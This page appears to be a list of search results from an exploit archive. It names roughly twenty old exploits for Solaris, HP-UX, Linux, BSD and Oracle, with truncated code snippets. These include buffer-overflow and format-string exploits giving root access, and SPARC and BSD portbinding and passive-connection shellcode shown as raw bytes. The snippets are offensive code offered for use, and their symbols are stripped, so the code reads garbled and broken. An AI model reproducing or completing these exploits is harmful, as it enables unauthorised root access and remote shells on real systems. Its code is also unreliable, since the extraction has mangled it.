7261 matches found
Solaris sadmind Remote Buffer Overflow Exploit
Exploit for solaris platform in category remote exploits ============================================== Solaris sadmind Remote Buffer Overflow Exploit ============================================== /\ Super Solaris sadmin Exploit by optyx based on sadminsparc. and sadminx86.c by Cheez Whiz /...
HP-UX FTPD - Remote Buffer Overflow
HP-UX FTPD - Remote Buffer Overflow / theoretical exploit for hpux ftpd vulnerability / / not tested anywhere, needs tweaking / / c 2000 by babcia padlina ltd. / include include define NOPS 100 define BUFSIZE 1024 char shellcode = / HP-UX shellcode /...
Solaris sadmind - Remote Buffer Overflow
/\ Super Solaris sadmin Exploit by optyx based on sadminsparc. and sadminx86.c by Cheez Whiz / include include include include include char shellsparc = "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff" "\x90\x03\xe0\x5c\x92\x22\x20\x10\x94\x1b\xc0\x0f"...
INNDNNRP 1.6.x - Remote Overflow
INNDNNRP 1.6.x - Remote Overflow / INND/NNRP remote root overflow / include include include include define DEFAULTOFFSET 792 define BUFFERSIZE 796 define ADDRS 80 define RET 0xefbf95e4 define NOP "\x08\x21\x02\x80" int mainargc, argv int argc; char argv; char buff = NULL, ptr = NULL; ulong addrpt...
GLIBC - binsu Local Privilege Escalation
GLIBC - binsu Local Privilege Escalation / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of /bin/su program with the address of the shellcode, so, the program executes it when main returns or exit is called Thanks a lot to...
GLIBC (via /bin/su) Local Root Exploit
Exploit for linux platform in category local exploits ====================================== GLIBC via /bin/su Local Root Exploit ====================================== / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of...
INND/NNRP < 1.6.X Remote Root Overflow Exploit
Exploit for linux platform in category remote exploits ============================================== INND/NNRP include include include define DEFAULTOFFSET 792 define BUFFERSIZE 796 define ADDRS 80 define RET 0xefbf95e4 define NOP "\x08\x21\x02\x80" int mainargc, argv int argc; char argv; char...
BFTPd vsprintf() Format Strings Exploit
Exploit for linux platform in category remote exploits ======================================= BFTPd vsprintf Format Strings Exploit ======================================= Copyright c 2000 - Security.is The following material may be freely redistributed, provided that the code or the disclaimer...
BFTPd - 'vsprintf()' Format Strings
/ Copyright c 2000 - Security.is The following material may be freely redistributed, provided that the code or the disclaimer have not been partly removed, altered or modified in any way. The material is the property of security.is. You are allowed to adopt the represented code in your programs,...
HP-UX 11.0 pppd Stack Buffer Overflow Exploit
Exploit for hp-ux platform in category local exploits ============================================= HP-UX 11.0 pppd Stack Buffer Overflow Exploit ============================================= / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / /...
Oracle 8.x - cmctl Buffer Overflow
/ source: https://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. The problem occurs in the way cmctl handles the user-supplied command line arguments. The string...
Oracle 8.x - cmctl Buffer Overflow
Oracle 8.x - cmctl Buffer Overflow / source: https://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. The problem occurs in the way cmctl handles the user-supplied comman...
Solaris/SPARC 2.7 / 7 locale Format String Exploit
Exploit for solaris platform in category local exploits ================================================== Solaris/SPARC 2.7 / 7 locale Format String Exploit ================================================== / Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on t...
HP-UX 11.0 - pppd Local Stack Buffer Overflow
HP-UX 11.0 - pppd Local Stack Buffer Overflow / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / / The copyright notice above does not evidence any / / actual or intended publication of such source code. / / / / Title: HP-UX pppd / / Tested...
SolarisSPARC 2.7 7 locale - Format String
SolarisSPARC 2.7 7 locale - Format String / Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on the exploit by Warning3 For additional information see http://www.phreedom.org/solar/localesol.txt By Solar Eclipse Assistant Editor, Phreedom Magazine...
Solaris/SPARC 2.7 / 7 locale - Format String
/ Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on the exploit by Warning3 For additional information see http://www.phreedom.org/solar/localesol.txt By Solar Eclipse Assistant Editor, Phreedom Magazine http://www.phreedom.org 10 Oct 2000 / include include defi...
BSD Passive Connection Shellcode
Exploit for bsd platform in category shellcode ================================ BSD Passive Connection Shellcode ================================ ; Passive Connection Shellcode ; ; Coded by Scrippie - email protected - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades...
solaris/SPARC portbinding shellcode
Exploit for solaris/sparc platform in category shellcode =================================== solaris/SPARC portbinding shellcode =================================== / Solaris - Sparc - www.dopesquad.net / char shellcode = "\xa0\x23\xa0\x10" / sub %sp, 16, %l0 / "\xae\x23\x80\x10" / sub %sp, %l0,...
solaris/SPARC portbinding shellcode
solaris/SPARC portbinding shellcode. Shellcode exploit for solarissparc platform / Solaris - Sparc - www.dopesquad.net / char shellcode = "\xa0\x23\xa0\x10" / sub %sp, 16, %l0 / "\xae\x23\x80\x10" / sub %sp, %l0, %l7 / "\xee\x23\xbf\xec" / st %l7, %sp - 20 / "\x82\x05\xe0\xd6" / add %l7, 214, %g1...
BSD Passive Connection Shellcode
BSD Passive Connection Shellcode. Shellcode exploit for bsd platform ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntaxis - it's gross and...